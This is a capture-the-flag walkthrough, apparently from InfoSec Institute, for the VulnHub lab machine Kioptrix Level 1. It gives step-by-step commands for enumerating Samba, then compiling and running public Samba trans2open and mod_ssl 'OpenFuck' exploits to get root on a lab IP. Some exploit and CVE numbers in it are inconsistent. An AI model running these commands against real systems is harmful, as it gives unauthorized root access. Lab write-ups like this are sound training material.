Kioptrix: Level 1 surfaced on VulnHub on February 17th, 2010. Created by Kioptrix, it can be found at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. It is the first machine in the Kioptrix series. The objective is to get root privileges and find root’s email.

For the attacking machine, I will be using Kali 2017.1.

Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

  • Port 22 – Running OpenSSH
  • Port 80 – Running Apache Web server
  • Port 111 – Running RPC
  • Port 139 – Running Samba
  • Port 443 – Running Apache. We server over ssl
  • Port 1024 – Running RPC

Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:

Moreover, I did not find anything interesting within their source code as well. Going back to see the services that are being run, Samba is something that interests me. So, I run an enumeration on it:

$ enum4linux -a 172.16.92.138 > output.txt

This gives us a lot of information including the Samba version is being used, 2.2.1a. Upon doing a simple exploit, I see that a Remote Code Execution exploit is available:

$ searchsploit samba 2.2

I copy the exploit to the root directory as exploit.c:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

then I compile the exploit via gcc:

$ gcc -o samba exploit.c

I am given the final file proper permissions:

$ chmod 755 samba

Let’s dry run the exploit and see what all parameters are required:

Okay then, I think we are ready to use this:

$ ./samba -b 0 -c 172.16.92.133 172.16.92.138

And we are in with root privileges! Now we need to find the email.

I found the email under /var/mail:

Ethical Hacking Training – Resources (InfoSec)

While playing around it with more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201):

$ use exploit/linux/samba/trans2open

Another way of getting into the machine was via exploit mod_ssl (CVE 2002 – 0082). I found its exploit at https://www.exploit-db.com/exploits/764/

$ gcc -o OpenFuck 746.c -lcrypto

Note: Since the exploit is old, you can update it by following the following tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will require libssl and libssl-dev before you compile the exploit.

Let’s exploit!

$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40

InfoSec Institute
Rated 4.3/5 based on 302 customer reviews.
InfoSec Resources